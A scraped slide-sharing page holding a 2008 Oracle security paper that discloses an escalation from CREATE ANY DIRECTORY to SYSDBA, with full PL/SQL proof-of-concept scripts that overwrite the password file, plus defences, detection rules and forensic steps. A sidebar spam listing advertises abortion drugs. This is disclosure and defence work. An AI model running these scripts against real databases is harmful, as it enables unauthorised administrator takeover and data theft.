Asian Spirit 3 Day Dba On UblAsian Spirit 3 Day Dba On Ubl
Asian Spirit 3 Day Dba On Ubl
 
Network Manual
Network ManualNetwork Manual
Network Manual
 
Create manula and automaticly database
Create manula and automaticly databaseCreate manula and automaticly database
Create manula and automaticly database
 
Installing & Configuring IBM Domino 9 on CentOS
Installing & Configuring IBM Domino 9 on CentOSInstalling & Configuring IBM Domino 9 on CentOS
Installing & Configuring IBM Domino 9 on CentOS
 
Plesk 8.2 for Windows Backup and Restore Utilities ...
Plesk 8.2 for Windows Backup and Restore Utilities ...Plesk 8.2 for Windows Backup and Restore Utilities ...
Plesk 8.2 for Windows Backup and Restore Utilities ...
 
Plesk 8.2 for Windows Backup and Restore Utilities ...
Plesk 8.2 for Windows Backup and Restore Utilities ...Plesk 8.2 for Windows Backup and Restore Utilities ...
Plesk 8.2 for Windows Backup and Restore Utilities ...
 
Oracle12c Pluggable Database Hands On - TROUG 2014
Oracle12c Pluggable Database Hands On - TROUG 2014Oracle12c Pluggable Database Hands On - TROUG 2014
Oracle12c Pluggable Database Hands On - TROUG 2014
 
Introduction to JumpStart
Introduction to JumpStartIntroduction to JumpStart
Introduction to JumpStart
 
Hdf installing-hdf
Hdf installing-hdfHdf installing-hdf
Hdf installing-hdf
 
Kubernetes Story - Day 1: Build and Manage Containers with Podman
Kubernetes Story - Day 1: Build and Manage Containers with PodmanKubernetes Story - Day 1: Build and Manage Containers with Podman
Kubernetes Story - Day 1: Build and Manage Containers with Podman
 
What is this "docker"
What is this "docker" What is this "docker"
What is this "docker"
 

Último

PROCESS RECORDING FORMAT.docx
PROCESS RECORDING FORMAT.docxPROCESS RECORDING FORMAT.docx
PROCESS RECORDING FORMAT.docxPoojaSen20
 
Understanding Accommodations and Modifications
Understanding Accommodations and ModificationsUnderstanding Accommodations and Modifications
Understanding Accommodations and ModificationsMJDuyan
 
How to Create and Manage Wizard in Odoo 17
How to Create and Manage Wizard in Odoo 17How to Create and Manage Wizard in Odoo 17
How to Create and Manage Wizard in Odoo 17Celine George
 
Micro-Scholarship, What it is, How can it help me.pdf
Micro-Scholarship, What it is, How can it help me.pdfMicro-Scholarship, What it is, How can it help me.pdf
Micro-Scholarship, What it is, How can it help me.pdfPoh-Sun Goh
 
Kodo Millet PPT made by Ghanshyam bairwa college of Agriculture kumher bhara...
Kodo Millet PPT made by Ghanshyam bairwa college of Agriculture kumher bhara...Kodo Millet PPT made by Ghanshyam bairwa college of Agriculture kumher bhara...
Kodo Millet PPT made by Ghanshyam bairwa college of Agriculture kumher bhara...pradhanghanshyam7136
 
Magic bus Group work1and 2 (Team 3).pptx
Magic bus Group work1and 2 (Team 3).pptxMagic bus Group work1and 2 (Team 3).pptx
Magic bus Group work1and 2 (Team 3).pptxdhanalakshmis0310
 
Seal of Good Local Governance (SGLG) 2024Final.pptx
Seal of Good Local Governance (SGLG) 2024Final.pptxSeal of Good Local Governance (SGLG) 2024Final.pptx
Seal of Good Local Governance (SGLG) 2024Final.pptxnegromaestrong
 
2024-NATIONAL-LEARNING-CAMP-AND-OTHER.pptx
2024-NATIONAL-LEARNING-CAMP-AND-OTHER.pptx2024-NATIONAL-LEARNING-CAMP-AND-OTHER.pptx
2024-NATIONAL-LEARNING-CAMP-AND-OTHER.pptxMaritesTamaniVerdade
 
ComPTIA Overview | Comptia Security+ Book SY0-701
ComPTIA Overview | Comptia Security+ Book SY0-701ComPTIA Overview | Comptia Security+ Book SY0-701
ComPTIA Overview | Comptia Security+ Book SY0-701bronxfugly43
 
Grant Readiness 101 TechSoup and Remy Consulting
Grant Readiness 101 TechSoup and Remy ConsultingGrant Readiness 101 TechSoup and Remy Consulting
Grant Readiness 101 TechSoup and Remy ConsultingTechSoup
 
Holdier Curriculum Vitae (April 2024).pdf
Holdier Curriculum Vitae (April 2024).pdfHoldier Curriculum Vitae (April 2024).pdf
Holdier Curriculum Vitae (April 2024).pdfagholdier
 
General Principles of Intellectual Property: Concepts of Intellectual Proper...
General Principles of Intellectual Property: Concepts of Intellectual Proper...General Principles of Intellectual Property: Concepts of Intellectual Proper...
General Principles of Intellectual Property: Concepts of Intellectual Proper...Poonam Aher Patil
 
UGC NET Paper 1 Mathematical Reasoning & Aptitude.pdf
UGC NET Paper 1 Mathematical Reasoning & Aptitude.pdfUGC NET Paper 1 Mathematical Reasoning & Aptitude.pdf
UGC NET Paper 1 Mathematical Reasoning & Aptitude.pdfNirmal Dwivedi
 
Jual Obat Aborsi Hongkong ( Asli No.1 ) 085657271886 Obat Penggugur Kandungan...
Jual Obat Aborsi Hongkong ( Asli No.1 ) 085657271886 Obat Penggugur Kandungan...Jual Obat Aborsi Hongkong ( Asli No.1 ) 085657271886 Obat Penggugur Kandungan...
Jual Obat Aborsi Hongkong ( Asli No.1 ) 085657271886 Obat Penggugur Kandungan...ZurliaSoop
 
Unit-IV- Pharma. Marketing Channels.pptx
Unit-IV- Pharma. Marketing Channels.pptxUnit-IV- Pharma. Marketing Channels.pptx
Unit-IV- Pharma. Marketing Channels.pptxVishalSingh1417
 
Accessible Digital Futures project (20/03/2024)
Accessible Digital Futures project (20/03/2024)Accessible Digital Futures project (20/03/2024)
Accessible Digital Futures project (20/03/2024)Jisc
 
psychiatric nursing HISTORY COLLECTION .docx
psychiatric nursing HISTORY COLLECTION .docxpsychiatric nursing HISTORY COLLECTION .docx
psychiatric nursing HISTORY COLLECTION .docxPoojaSen20
 
Python Notes for mca i year students osmania university.docx
Python Notes for mca i year students osmania university.docxPython Notes for mca i year students osmania university.docx
Python Notes for mca i year students osmania university.docxRamakrishna Reddy Bijjam
 
Unit-V; Pricing (Pharma Marketing Management).pptx
Unit-V; Pricing (Pharma Marketing Management).pptxUnit-V; Pricing (Pharma Marketing Management).pptx
Unit-V; Pricing (Pharma Marketing Management).pptxVishalSingh1417
 
ICT Role in 21st Century Education & its Challenges.pptx
ICT Role in 21st Century Education & its Challenges.pptxICT Role in 21st Century Education & its Challenges.pptx
ICT Role in 21st Century Education & its Challenges.pptxAreebaZafar22
 

Último (20)

PROCESS RECORDING FORMAT.docx
PROCESS RECORDING FORMAT.docxPROCESS RECORDING FORMAT.docx
PROCESS RECORDING FORMAT.docx
 
Understanding Accommodations and Modifications
Understanding Accommodations and ModificationsUnderstanding Accommodations and Modifications
Understanding Accommodations and Modifications
 
How to Create and Manage Wizard in Odoo 17
How to Create and Manage Wizard in Odoo 17How to Create and Manage Wizard in Odoo 17
How to Create and Manage Wizard in Odoo 17
 
Micro-Scholarship, What it is, How can it help me.pdf
Micro-Scholarship, What it is, How can it help me.pdfMicro-Scholarship, What it is, How can it help me.pdf
Micro-Scholarship, What it is, How can it help me.pdf
 
Kodo Millet PPT made by Ghanshyam bairwa college of Agriculture kumher bhara...
Kodo Millet PPT made by Ghanshyam bairwa college of Agriculture kumher bhara...Kodo Millet PPT made by Ghanshyam bairwa college of Agriculture kumher bhara...
Kodo Millet PPT made by Ghanshyam bairwa college of Agriculture kumher bhara...
 
Magic bus Group work1and 2 (Team 3).pptx
Magic bus Group work1and 2 (Team 3).pptxMagic bus Group work1and 2 (Team 3).pptx
Magic bus Group work1and 2 (Team 3).pptx
 
Seal of Good Local Governance (SGLG) 2024Final.pptx
Seal of Good Local Governance (SGLG) 2024Final.pptxSeal of Good Local Governance (SGLG) 2024Final.pptx
Seal of Good Local Governance (SGLG) 2024Final.pptx
 
2024-NATIONAL-LEARNING-CAMP-AND-OTHER.pptx
2024-NATIONAL-LEARNING-CAMP-AND-OTHER.pptx2024-NATIONAL-LEARNING-CAMP-AND-OTHER.pptx
2024-NATIONAL-LEARNING-CAMP-AND-OTHER.pptx
 
ComPTIA Overview | Comptia Security+ Book SY0-701
ComPTIA Overview | Comptia Security+ Book SY0-701ComPTIA Overview | Comptia Security+ Book SY0-701
ComPTIA Overview | Comptia Security+ Book SY0-701
 
Grant Readiness 101 TechSoup and Remy Consulting
Grant Readiness 101 TechSoup and Remy ConsultingGrant Readiness 101 TechSoup and Remy Consulting
Grant Readiness 101 TechSoup and Remy Consulting
 
Holdier Curriculum Vitae (April 2024).pdf
Holdier Curriculum Vitae (April 2024).pdfHoldier Curriculum Vitae (April 2024).pdf
Holdier Curriculum Vitae (April 2024).pdf
 
General Principles of Intellectual Property: Concepts of Intellectual Proper...
General Principles of Intellectual Property: Concepts of Intellectual Proper...General Principles of Intellectual Property: Concepts of Intellectual Proper...
General Principles of Intellectual Property: Concepts of Intellectual Proper...
 
UGC NET Paper 1 Mathematical Reasoning & Aptitude.pdf
UGC NET Paper 1 Mathematical Reasoning & Aptitude.pdfUGC NET Paper 1 Mathematical Reasoning & Aptitude.pdf
UGC NET Paper 1 Mathematical Reasoning & Aptitude.pdf
 
Jual Obat Aborsi Hongkong ( Asli No.1 ) 085657271886 Obat Penggugur Kandungan...
Jual Obat Aborsi Hongkong ( Asli No.1 ) 085657271886 Obat Penggugur Kandungan...Jual Obat Aborsi Hongkong ( Asli No.1 ) 085657271886 Obat Penggugur Kandungan...
Jual Obat Aborsi Hongkong ( Asli No.1 ) 085657271886 Obat Penggugur Kandungan...
 
Unit-IV- Pharma. Marketing Channels.pptx
Unit-IV- Pharma. Marketing Channels.pptxUnit-IV- Pharma. Marketing Channels.pptx
Unit-IV- Pharma. Marketing Channels.pptx
 
Accessible Digital Futures project (20/03/2024)
Accessible Digital Futures project (20/03/2024)Accessible Digital Futures project (20/03/2024)
Accessible Digital Futures project (20/03/2024)
 
psychiatric nursing HISTORY COLLECTION .docx
psychiatric nursing HISTORY COLLECTION .docxpsychiatric nursing HISTORY COLLECTION .docx
psychiatric nursing HISTORY COLLECTION .docx
 
Python Notes for mca i year students osmania university.docx
Python Notes for mca i year students osmania university.docxPython Notes for mca i year students osmania university.docx
Python Notes for mca i year students osmania university.docx
 
Unit-V; Pricing (Pharma Marketing Management).pptx
Unit-V; Pricing (Pharma Marketing Management).pptxUnit-V; Pricing (Pharma Marketing Management).pptx
Unit-V; Pricing (Pharma Marketing Management).pptx
 
ICT Role in 21st Century Education & its Challenges.pptx
ICT Role in 21st Century Education & its Challenges.pptxICT Role in 21st Century Education & its Challenges.pptx
ICT Role in 21st Century Education & its Challenges.pptx
 

Create Any Directory To SYSDBA

  • 1. 1 CREATE ANY DIRECTORY to SYSDBA http://www.oracleforensics.com/wordpress/index.php/2008/10/10/create-any-directory-to-sysdba/ Paul M. Wright 06/10/2008 http://www.oracleforensics.com 1. Introduction .....................................................................................................................1 2. Create user with CREATE ANY DIRECTORY and CREATE SESSION .............................1 3. Find the password file location ........................................................................................2 4. Create the directory.........................................................................................................2 5. Overwrite the secret password file with a known password file to gain SYSDBA ..............3 6. How to defend against this? ............................................................................................5 7. Forensic Response .........................................................................................................6 8. Conclusions. ...................................................................................................................8 1. Introduction An Oracle DB user which has been granted CREATE ANY DIRECTORY can use that system privilege to grant themselves the SYSDBA system privilege by creating a DIRECTORY pointing to the password file location on the OS and then overwriting it with a previously prepared known password file using UTL_FILE.PUT_RAW from within the DB. This paper will show how the issue can be exploited and most importantly how to secure against it. This is an original vulnerability affecting current versions of the DB and please note that Oracle Corp’s Security Department have already been informed in accordance with ethical procedures. (Proof of concept code tested on 10.1, 10.2 and 11g on both Linux and Windows). 2.Create user with CREATE ANY DIRECTORY and CREATE SESSION C:SQLPLUS SYS/ORCL@192.168.1.137/ORCL AS SYSDBA SQL> CREATE USER CDTEST IDENTIFIED BY CDTEST; User created. SQL> GRANT CREATE SESSION TO CDTEST; Grant succeeded. SQL> GRANT CREATE ANY DIRECTORY TO CDTEST; SQL> SELECT * FROM V$PWFILE_USERS; --Only SYS is SYSDBA currently USERNAME SYSDB SYSOP ------------------------------ ----- ----- SYS TRUE TRUE
  • 2. 2 3. Find the password file location $ORACLE_HOME/dbs/orapw$ORACLE_SID --on Unix %ORACLE_HOME%databasePWD%ORACLE_SID%.ora --on Windows –-connect as non SYSDBA (with just CREATE ANY DIRECTORY and CREATE SESSION) SQL> CONN CDTEST/CDTEST Connected. --can infer probable location via other DIRECTORYs that may exist. --note that when a DIRECTORY is created by default PUBLIC is granted knowledge of it's existence through ALL_DIRECTORIES. SQL> SELECT * FROM ALL_DIRECTORIES; OWNER DIRECTORY_NAME DIRECTORY_PATH ----- ------------------------------ SYS DM_PMML_DIR F:oracleproduct10.1.0db_2dmadmin SYS LOG_FILE_DIR F:oracleproduct10.1.0db_2demoschemalog SYS DATA_FILE_DIR F:oracleproduct10.1.0db_2demoschemasales_history F:oracleproduct10.1.0db_2database is the password file location on windows. On Linux it is $ORACLE_HOME/dbs/ 4. Create the DIRECTORY SQL> CREATE OR REPLACE DIRECTORY TESTPASS AS 'F:ORACLEPRODUCT10.1.0DB_2DATABASE'; Directory created. Use PL/SQL to make a backup copy of the password file so that the overwritten password file can be replaced UTL_FILE has EXECUTE granted to PUBLIC by default. SQL> select grantee from dba_tab_privs where table_name='UTL_FILE'; GRANTEE ------------------------------ PUBLIC BEGIN utl_file.fcopy('TESTPASS', 'PWDorcl.ora', 'TESTPASS', 'PWDorcl.oraBU'); END; / SQL> BEGIN 2 utl_file.fcopy('TESTPASS', 'PWDorcl.ora', 'TESTPASS', 'PWDorcl.oraBU'); 3 END; 4 / PL/SQL procedure successfully completed.
  • 3. 3 5. Overwrite secret password file with known file to gain SYSDBA SQL> @createdirectory2sysdba.sql PL/SQL procedure successfully completed. --below are the contents of createdirectory2sysdba.sql --note windows adds 0D 0A to end as CTRL LF therefore removed 4 0's of password file to compensate --Oracle checks the size of the PWFILE not it's contents.. --WINDOWS VERSION 10.2.0.1.0 DECLARE fi UTL_FILE.FILE_TYPE; bu RAW(32767); bu2 varchar2(32767); bu3 varchar2(32767); BEGIN bu2:=hextoraw('000000000000000000000000000000000000000000020000020000005d5c5b 5a000000000000000000000000000000000000000000000000000000000000000000000000000 00000000000000000000000000000000000000000000000000000000000000000000000000000 00000000000000000000000000000000000000000000000000000000000000000000000000000 00000000000000000000000000000000000000000000000000000000000000000000000000000 00000000000000000000000000000000000000000000000000000000000000000000000000000 00000000000000000000000000000000000000000000000000000000000000000000000000000 00000000000000000000000000000000000000000000000000000000000000000000000000000 00000000000000000000000000000000000000000000000000000000000000000000000000000 00000000000000000000000000000000000000000000000000000000000000000000000000000 00000000000000000000000000000000000000000000000000000000000000000000000000000 00000000000000000000000000000000000000000000000000000000000000000000000000000 00000000000000000000000000000000000000000000000000000000000000000000000000000 000000000000000000000000000000000000004f5241434c452052656d6f74652050617373776 f72642066696c650000001b004f52434c00000000000000000000000000000000000000000000 00000000040001000000000000000000000000000000000000000000000000000000000000004 94e5445524e414c00000000000000000000000000000000000000000000000008000000373639 4330434438343946394238423200000000000000000000000000000000100000000f000000000 00000000000000000000000000000000000000000000000000000535953000000000000000000 00000000000000000000000000000000000000000300000035363338323238444146353238303 54600000000000000000000000000000000100000000f'); bu3:=hextoraw('00000000000000000000000000000000000000000000000000000000000000 00000000000000000782af445359534d414e00000000000000000000000000000000000000000 00000000000060000004138443641453346343145463931454100000000000000000000000000 000000100000000b0000000000000000000000000000000000000000000000000000000000000 00000000000000000000000000000000000000000000000000000000000000000000000000000 00000000000000000000000000000000000000000000000000000000000000000000000000000 00000000000000000000000000000004344544553540000000000000000000000000000000000 00000000000000000006000000313438304144333244303842304543390000000000000000000 0000000000000100000000b000000000000000000000000000000000000000000000000000000 00000000000000000000000000000000000000000000000000000000000000000000000000000 00000000000000000000000000000000000000000000000000000000000000000000000000080 00000000000000000000000000000000000000000000000000000000000000000000000000000 00000000000000000000000000000000000000000000000000000000000000000000000000000 00000000000000000000000000000000000000000000000000000000000000000000000000000 00000000000000000000000000000000000000000000000000000000000000000000000000000 00000000000000000000000000000000000000000000000000000000000000000000000000000 00000000000000000000000000000000000000000000000000000000000000000000000000000 00000000000000000000000000000000000000000000000000000000000000000000000000000 00000000000000000000000000000000000000000000000000000000000000000000000000000 00000000000000000000000000000000000000000000000000'); bu := hextoraw(bu2||bu3); fi:=UTL_FILE.fopen('TESTPASS','PWDorcl.ora','w',32767); UTL_FILE.put_raw(fi,bu,TRUE); UTL_FILE.fclose(fi); END; /
  • 4. 4 --Linux VERSION 10.2.0.1.0 adds 0A as LF therefore remove 2 0's to compensate DECLARE fi UTL_FILE.FILE_TYPE; bu RAW(32767); bu2 varchar2(32767); bu3 varchar2(32767); BEGIN bu2:=hextoraw('000000000000000000000000000000000000000000020000020000005d5c5b 5a000000000000000000000000000000000000000000000000000000000000000000000000000 00000000000000000000000000000000000000000000000000000000000000000000000000000 00000000000000000000000000000000000000000000000000000000000000000000000000000 00000000000000000000000000000000000000000000000000000000000000000000000000000 00000000000000000000000000000000000000000000000000000000000000000000000000000 00000000000000000000000000000000000000000000000000000000000000000000000000000 00000000000000000000000000000000000000000000000000000000000000000000000000000 00000000000000000000000000000000000000000000000000000000000000000000000000000 00000000000000000000000000000000000000000000000000000000000000000000000000000 00000000000000000000000000000000000000000000000000000000000000000000000000000 00000000000000000000000000000000000000000000000000000000000000000000000000000 00000000000000000000000000000000000000000000000000000000000000000000000000000 000000000000000000000000000000000000004f5241434c452052656d6f74652050617373776 f72642066696c650000001b004f52434c00000000000000000000000000000000000000000000 00000000040001000000000000000000000000000000000000000000000000000000000000004 94e5445524e414c00000000000000000000000000000000000000000000000008000000373639 4330434438343946394238423200000000000000000000000000000000100000000f000000000 00000000000000000000000000000000000000000000000000000535953000000000000000000 00000000000000000000000000000000000000000300000035363338323238444146353238303 54600000000000000000000000000000000100000000f'); bu3:=hextoraw('00000000000000000000000000000000000000000000000000000000000000 00000000000000000782af445359534d414e00000000000000000000000000000000000000000 00000000000060000004138443641453346343145463931454100000000000000000000000000 000000100000000b0000000000000000000000000000000000000000000000000000000000000 00000000000000000000000000000000000000000000000000000000000000000000000000000 00000000000000000000000000000000000000000000000000000000000000000000000000000 00000000000000000000000000000004344544553540000000000000000000000000000000000 00000000000000000006000000313438304144333244303842304543390000000000000000000 0000000000000100000000b000000000000000000000000000000000000000000000000000000 00000000000000000000000000000000000000000000000000000000000000000000000000000 00000000000000000000000000000000000000000000000000000000000000000000000000080 00000000000000000000000000000000000000000000000000000000000000000000000000000 00000000000000000000000000000000000000000000000000000000000000000000000000000 00000000000000000000000000000000000000000000000000000000000000000000000000000 00000000000000000000000000000000000000000000000000000000000000000000000000000 00000000000000000000000000000000000000000000000000000000000000000000000000000 00000000000000000000000000000000000000000000000000000000000000000000000000000 00000000000000000000000000000000000000000000000000000000000000000000000000000 00000000000000000000000000000000000000000000000000000000000000000000000000000 0000000000000000000000000000000000000000000000000000'); bu := hextoraw(bu2||bu3); fi:=UTL_FILE.fopen('TESTPASS','orapworcl','w',32767); UTL_FILE.put_raw(fi,bu,TRUE); UTL_FILE.fclose(fi); END; / SQL> SELECT * FROM V$PWFILE_USERS; -- CDTEST is SYSDBA now USERNAME SYSDB SYSOP ------------------------------ ----- ----- SYS TRUE TRUE SYSMAN TRUE FALSE CDTEST TRUE FALSE
  • 5. 5 That is how to escalate from CREATE ANY DIRECTORY to SYSDBA and has been found to be reliable. This process relies on the fact that the Oracle DB allows DIRECTORY access to the password file location and allows UTL_FILE to overwrite the password file. Additionally the database does not check either the state via checksum or the timestamp of the password file to see whether it has been modified or indeed whether the password file was in fact created on a completely different database as is the case in this example. The Oracle DB only checks the size of the file is correct. Note: If the password file becomes corrupted you can recreate it using this command. orapwd file=PWDorcl.ora password=syspassword 6. How to defend against this? In addition to general DB hardening the analyst should REVOKE PUBLIC EXECUTE on UTL_FILE, and REVOKE CREATE ANY DIRECTORY from all but SYSDBA. Only SYSDBAs should be creating directories. Which roles, users and system privileges have CREATE ANY DIRECTORY? -DBA -IMP_FULL_DATABASE -WKSYS -SYS -SYSDBA and importantly any application that needs to create a DIRECTORY on the OS will also have CREATE ANY DIRECTORY. There may actually be quite a few of these and if the application was vulnerable to SQL injection then a Web app user may escalate to SYSDBA on the DB via the web app and then be able to ex-filtrate the data back to themselves via firewall egress. The following measures will help defend against the problem of being able to use CREATE ANY DIRECTORY to gain SYSDBA. 1. Don't grant CREATE ANY DIRECTORY to any user (only for SYSDBAs). 2. Delete all DIRECTORYs after usage. 3. Also check the last modified time on the password file. 4. Checksum the state of the password file. 5. Generally harden the DB to stop someone granting themselves CREATE ANY DIRECTORY. Additionally add a Sentrigo Hedgehog [1] rule to match on the location of the password file and another one to alert on the usage of CREATE ANY DIRECTORY. This is an easy one. statement CONTAINS 'F:oracleproduct10.1.0db_2database' statement CONTAINS 'create directory'
  • 6. 6 7. Forensic Response The problem with this attack and others of it's type is that because the highest privilege of SYSDBA is gained the attacker is free to cover their tracks and install a backdoor so that the attack appears not to have happened. SELECT * FROM DBA_DIRECTORIES; no results The attacker will have dropped the incriminating directory after creating the backdoor. This requires the DROP ANY DIRECTORY privilege, but since the attacker has gained SYSDBA this is not a problem. DROP DIRECTORY TESTPASS; So how to respond? … This is where Oracle Forensic skills come in very useful! Forensic investigation shows that the DIRECTORY path is persisted in SYSTEM01.dbf even after the DIRECTORY has been deleted and the DB restarted. All of the DIRECTORY paths are recorded in SYSTEM01.dbf and can be viewed using Hexedit[2] on Linux. SQL> create directory testpass as '/u01/app/oracle/oracle/product/10.2.0/db_4/dbs' 2 ; Directory created. hexedit and tab to the ascii and the ctrl s on the serarch dtring 00475320 00 00 00 00 00 00 00 00 00 2C 01 03 04 C3 06 37 .........,.....7 00475330 10 26 2D 2D 2D 2D 2D 2D 2D 2D 2D 2D 2D 2D 2D 2D .&-------------- 00475340 2D 2D 2D 2D 2D 2D 2D 2D 2D 2D 2D 2D 2D 2D 2D 2D ---------------- 00475350 2D 2D 2D 2D 2D 2D 2D 2D 2E 2F 75 30 31 2F 61 70 --------./u01/ap 00475360 70 2F 6F 72 61 63 6C 65 2F 6F 72 61 63 6C 65 2F p/oracle/oracle/ 00475370 70 72 6F 64 75 63 74 2F 31 30 2E 32 2E 30 2F 64 product/10.2.0/d 00475380 62 5F 34 2F 64 62 73 3C 02 03 04 C3 06 32 61 26 b_4/dbs<.....2a& 00475390 2D 2D 2D 2D 2D 2D 2D 2D 2D 2D 2D 2D 2D 2D 2D 2D ---------------- DROP DIRECTORY TESTPASS; COMMIT; SHUTDOWN IMMEDIATE; STARTUP; This is what the .dbf looks like after the DIRECTORY has been deleted and DB restarted...i.e. The DIRECTORY is still there in the .dbf .. 00475330 10 26 2D 2D 2D 2D 2D 2D 2D 2D 2D 2D 2D 2D 2D 2D .&-------------- 00475340 2D 2D 2D 2D 2D 2D 2D 2D 2D 2D 2D 2D 2D 2D 2D 2D ---------------- 00475350 2D 2D 2D 2D 2D 2D 2D 2D 2E 2F 75 30 31 2F 61 70 --------./u01/ap 00475360 70 2F 6F 72 61 63 6C 65 2F 6F 72 61 63 6C 65 2F p/oracle/oracle/ 00475370 70 72 6F 64 75 63 74 2F 31 30 2E 32 2E 30 2F 64 product/10.2.0/d 00475380 62 5F 34 2F 64 62 73 3C 02 03 04 C3 06 32 61 26 b_4/dbs<.....2a& 00475390 2D 2D 2D 2D 2D 2D 2D 2D 2D 2D 2D 2D 2D 2D 2D 2D ---------------- 004753A0 2D 2D 2D 2D 2D 2D 2D 2D 2D 2D 2D 2D 2D 2D 2D 2D ---------------- The same is true for Windows as shown in the screenshot overleaf.
  • 7. 7 Figure 1 Windows DBF showing deleted directory paths after reboot So this tells the Forensic Examiner that a DIRECTORY has existed previously but no longer shows in DBA_DIRECTORIES i.e. it has been deleted! The DIRECTORY path shown in the .dbf is F:oracleproduct10.1.0db_2database' which points to the password file. It is interesting to note that DIRECTORY paths that were created most recently appear nearer the top of the list in the data file and descend. If there is a deleted DIRECTORY pointing to the password file, as per the example above, then the Forensic Analyst will need to check the system in detail for potential backdoors [3].
  • 8. 8 8. Conclusion To secure against this privilege escalation we now know to REVOKE CREATE ANY DIRECTORY, monitor the password file, DROP DIRECTORYs and REVOKE PUBLIC EXECUTE on UTL_FILE. However, the nub of the problem is that the Oracle DB has only two modes of operation for DIRECTORYs. Either you can't create DIRECTORYs at all OR you can create them where ever you want including on the password file or in C: on Windows. There should, in the Author's opinion, be a finer level of control over the allocation of privilege to create DIRECTORYs within the Oracle DB. This finer level of control should include the ability to restrict access to particular parts of the OS and perhaps in future evolve to enable allocation of a privilege for a given duration for use at a specific time i.e. user W needs privilege X for duration Y at time Z. In the shorter term the Oracle DB could be improved by making it check the state and timestamp of the password file in addition to the size of the file as it does currently. This is a core forensic concept as outlined in the first book [4] on the subject of Database Forensics [5]. Any questions about this paper email the Author at paul.wright@oracleforensics.com 9. References 1. http://www.oracleforensics.com/wordpress/index.php/2008/09/14/sentrigo-solves-db-security-problems/ 2. http://www.physics.ohio-state.edu/~prewett/hexedit/ 3. http://www.oracleforensics.com/oraclesysdbabackdoor.pdf 4. Oracle Forensics – Oracle Security Best Practices - Paul M. Wright ISBN 0-9776715-2-6 ISBN 13 978-0977671526 Library of Congress Number 2007930081 Publication Date - May 2008 by Rampant Tech Press http://www.rampant-books.com/book_2007_1_oracle_forensics.htm 5. http://en.wikipedia.org/w/index.php?title=Database_Forensics&action=history